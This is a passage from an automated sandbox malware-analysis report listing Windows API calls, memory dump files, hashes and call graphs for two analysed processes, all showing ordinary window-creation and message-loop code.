                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1796709256.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.1796686567.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796730964.0000000000402000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796753746.0000000000403000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796753746.0000000000408000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796800725.0000000000411000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796800725.0000000000E11000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1798081577.0000000000F77000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_x6.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.1796709256.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.1796686567.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796730964.0000000000402000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796753746.0000000000403000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796753746.0000000000408000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796800725.0000000000411000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1796800725.0000000000E11000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 00000007.00000002.1798081577.0000000000F77000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_x6.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

                                                    Execution Graph

                                                    Execution Coverage:83.7%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:5
                                                    Total number of Limit Nodes:1

                                                    Callgraph

                                                    • Executed
                                                    • Not Executed
                                                    • Opacity -> Relevance
                                                    • Disassembly available
                                                    callgraph 0 Function_00401000 1 Function_00401AE1 1->0

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                    • RegisterClassExA.USER32(00000030), ref: 0040106E
                                                    • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                    • ShowWindow.USER32(00000001,?), ref: 004010BC
                                                    • UpdateWindow.USER32(00000001), ref: 004010C7
                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                    • TranslateMessage.USER32(?), ref: 004010E4
                                                    • DispatchMessageA.USER32(?), ref: 004010ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1808061785.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000008.00000002.1808034496.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000008.00000002.1808127317.0000000000402000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000008.00000002.1808165368.0000000000403000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000008.00000002.1808165368.0000000000408000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000008.00000002.1808238284.0000000000411000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_400000_x5.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
                                                    • String ID: 0$WinClass32
                                                    • API String ID: 282685165-2329282442
                                                    • Opcode ID: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction ID: db64ee9f6a3c3da8bd2a7b60d0102d68ead382408d30bf1f106ff4c9428f50ce
                                                    • Opcode Fuzzy Hash: 286dd39defc53bc53642eb2300d05e627e30782ba9ed8b70d4df91332c1cf868
                                                    • Instruction Fuzzy Hash: F7213C70D44248AAEF11DFD0CD46BDDBFB8AB04708F20802AF600BA1E5D7B966459B5C

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                    • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                      • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                      • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                      • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                      • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                      • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                      • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                      • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                      • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                      • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                    • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                    Memory Dump Source
                                                    • Source File: 00000008.00000002.1808061785.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000008.00000002.1808034496.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000008.00000002.1808127317.0000000000402000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000008.00000002.1808165368.0000000000403000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000008.00000002.1808165368.0000000000408000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                    • Associated: 00000008.00000002.1808238284.0000000000411000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_8_2_400000_x5.jbxd
                                                    Similarity
                                                    • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                    • String ID:
                                                    • API String ID: 673778540-0
                                                    • Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
                                                    • Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
                                                    • Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D